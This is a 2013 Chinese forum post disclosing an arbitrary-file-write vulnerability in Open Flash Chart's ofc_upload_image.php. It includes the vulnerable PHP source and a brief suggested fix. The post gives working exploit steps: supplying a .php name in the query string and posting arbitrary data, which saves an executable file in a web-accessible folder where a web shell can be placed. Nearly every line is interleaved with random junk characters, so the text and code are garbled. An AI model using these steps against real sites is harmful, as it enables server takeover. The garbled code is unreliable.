POST 数据漏洞文件执行任意后缀文件保存
4 R' ?! d- }3 o( b+ g 漏洞文件/chart/php-ofc-library/ofc_upload_image.php/ S0 A4 @) @ y
: H) u& ]' U- I2 n; c/ O利用:
; I2 b+ o& Y9 M/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
P" Q% ?/ a1 I
" L/ L! Z0 g- L2 S% V2 w X IPost任意数据4 B2 _9 _! p- f3 j
保存位置http://localhost/chart/tmp-upload-images/hfy.php
% y/ ?1 U3 j4 W; d0 }4 [. F- Y* ]: o4 _9 A( ~$ Z; t) F
1 i! X! }4 N9 w3 [, B- \7 e最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
$ f; |6 ]/ R2 j( I" W, j# m
) m3 G1 s# t9 {8 F. o<?php4 Z; t" ^2 s$ _3 K5 s& M0 L
w) d8 Q3 A5 }3 W/ p$ C) H
//
+ E$ Z, G1 b- Q) M) E// In Open Flash Chart -> save_image debug mode, you
T/ T' \: B' O) D4 i# ~// will see the 'echo' text in a new window.' A- _) f% b" w' m3 E* M
//) N1 V; m9 @' Z- I4 g# l7 [7 G( r
0 M$ f- T$ e" ~. {2 H7 h+ _/*
8 q6 U; `, _% g: f' @" e8 l4 r
5 q8 H3 Q, u; T! P% ^* Tprint_r( $_GET );
( r, W+ T/ h$ ^- p7 t* h, Q& Yprint_r( $_POST );- \1 u% f" c2 L' J; v& d
print_r( $_FILES );
) E, Q6 E6 d& e) Y; T0 d0 r" A$ e' M" x& X0 |0 i# ~# v k
print_r( $GLOBALS );
, b2 }: `5 c9 I3 m t8 Vprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
4 i& y; c8 F! L* A m8 C8 A5 p' z9 c3 [; `% _
*/$ U( f: G( U4 }# ]( E, A
// default path for the image to be stored //! p. W- g0 n8 m0 {
$default_path = '../tmp-upload-images/';6 B" k9 Z$ P" t# p! p- w# m0 ]
' Y c- J9 ~8 a2 N6 |
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
# ]6 x7 p f7 S; m9 H+ @; j) q9 g$ D4 W- s* t6 [
// full path to the saved image including filename //) S! O9 [: x/ V' _' ?6 T" X
$destination = $default_path . basename( $_GET[ 'name' ] );
/ }8 z8 m* M, u
: i4 ]& j: S- [% c. n: iecho 'Saving your image to: '. $destination;
$ e3 _% u" H1 r) H) |// print_r( $_POST );
! R z/ m5 h4 B0 f) L4 Q// print_r( $_SERVER );
/ N# U; `7 j+ j: P// echo $HTTP_RAW_POST_DATA;
7 n- i" T) [& v" u7 f7 F
; G! K+ l4 ^) d3 y! [! `" j' C- U( }//
; C2 {0 v3 i# O# S1 l- D6 l// POST data is usually string data, but we are passing a RAW .png
2 a8 _5 b4 H- i2 q5 B// so PHP is a bit confused and $_POST is empty. But it has saved/ f1 w7 @& P! M- S% e7 H4 H" \
// the raw bits into $HTTP_RAW_POST_DATA2 u& R4 x) E# `7 t% J# I7 A
//: y/ S' R8 ~& v7 u, B
* m0 S2 E% l) Z
$jfh = fopen($destination, 'w') or die("can't open file");
- N2 l# }+ X9 \+ {8 lfwrite($jfh, $HTTP_RAW_POST_DATA);* k0 g, l1 h% N9 ?( }# a
fclose($jfh);
% q" i# V, y0 o# |# |6 _- V7 z2 K& ]
//
5 }6 `" ~% }/ ]9 f* A( X// LOOK: w) P- d" K3 E" b, h4 N
//
8 }" ^- c4 d+ `7 B5 K5 zexit();8 H0 L, Q" T& X# N/ L
//
5 A& T T2 i2 _) M// PHP5:
$ s6 J7 z. [7 |8 G Y( O//+ f0 d7 V9 M# O
8 D1 f0 K2 y" R+ \
8 J/ M K F: A) J
// default path for the image to be stored //& Q1 h. j/ \/ X7 S
$default_path = 'tmp-upload-images/';
1 T0 P/ I# m0 T) f/ z* e% K
1 l' E+ i# M: z1 L! Wif (!file_exists($default_path)) mkdir($default_path, 0777, true);
% k) z1 x. R7 x1 L4 @7 g& e# G9 k$ ~2 O. X% f2 N
// full path to the saved image including filename // |4 L, z- u8 q5 i, d8 ^% }
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); 2 K+ _+ x* ?5 v& x
% w ~0 o: z2 l1 Z. h/ `// move the image into the specified directory //
9 p6 j. S$ \5 O5 r8 Rif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {& A/ H M+ z; Q4 l! x1 u1 B
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
3 m& K1 D; J: |} else {
+ @$ L% n; |) K, k. ?% |# B echo "FILE UPLOAD FAILED";
/ B2 \1 Z+ q, F) U) y} @, x! U; R: s& ]9 p5 \
5 `: q' @% a! N }8 T- }) k
6 [2 I0 C0 H+ |6 M; f?>1 k# D6 y/ \5 |2 B0 O; S
4 k2 \3 V, E& c1 i' m
) a# G/ I! g o2 K: y9 s* c
& L ^+ j! ]2 g: O
5 k* R4 [$ w6 r* \0 O. g# ?7 F% h) w( j) F1 t7 g Z) }2 B
, ^/ M9 O# O# R: S5 T, _
修复方案:
/ K# F# o+ f- X# Q9 j% d这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
- I T) g2 |% V2 o3 O, r- k7 B' E
4 \9 Y9 I" i; c) C+ A% @$ U
9 c5 h( E$ Y3 t6 l, O5 C+ r. m5 D( N1 {' v5 ?" ^' d3 U1 L
|
发表于 2013-2-23 12:38:58
收藏
支持
反对